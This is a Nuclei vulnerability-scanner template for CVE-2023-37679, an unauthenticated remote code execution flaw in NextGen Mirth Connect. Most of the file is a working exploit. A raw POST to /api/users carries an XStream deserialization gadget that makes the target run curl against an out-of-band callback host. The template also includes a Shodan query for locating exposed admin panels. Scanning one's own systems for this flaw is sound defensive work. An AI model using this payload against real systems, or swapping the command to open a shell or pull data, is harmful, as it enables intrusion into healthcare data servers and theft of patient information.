nuclei-templates/http/cves/2023/CVE-2023-37679.yaml

74 lines
2.4 KiB
YAML

id: CVE-2023-37679
info:
name: NextGen Mirth Connect - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability
reference:
- https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/
- https://nvd.nist.gov/vuln/detail/CVE-2023-37679
- http://mirth.com
- http://nextgen.com
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-37679
cwe-id: CWE-77
epss-score: 0.07033
epss-percentile: 0.93304
cpe: cpe:2.3:a:nextgen:mirth_connect:4.3.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: nextgen
product: mirth_connect
shodan-query: title:"mirth connect administrator"
tags: cve2023,cve,nextgen,rce
http:
- raw:
- |
GET /api/server/version HTTP/1.1
Host: {{Hostname}}
X-Requested-With: OpenAPI
- |
POST /api/users HTTP/1.1
Host: {{Hostname}}
X-Requested-With: OpenAPI
Content-Type: application/xml
<sorted-set>
<string>foo</string>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class="java.beans.EventHandler">
<target class="java.lang.ProcessBuilder">
<command>
<string>curl</string>
<string>http://{{interactsh-url}}/</string>
</command>
</target>
<action>start</action>
</handler>
</dynamic-proxy>
</sorted-set>
matchers:
- type: dsl
dsl:
- 'compare_versions(version, "<4.4.1")'
- 'contains(interactsh_protocol, "dns")'
- 'status_code_1 == 200 && status_code_2 == 500'
condition: and
extractors:
- type: regex
part: body_1
name: version
group: 1
regex:
- '(.*)'
internal: true
# digest: 4a0a00473045022100ae8a56772a4bdf5d579c5a73fbfb6039c2a9d3907cbd13cc12f77a507b42ac6202204915a2338b893189e1f666a217b8e10ce060bab542e3ecb50151f15b2ff37559:922c64590222798bb761d5b6d8e72950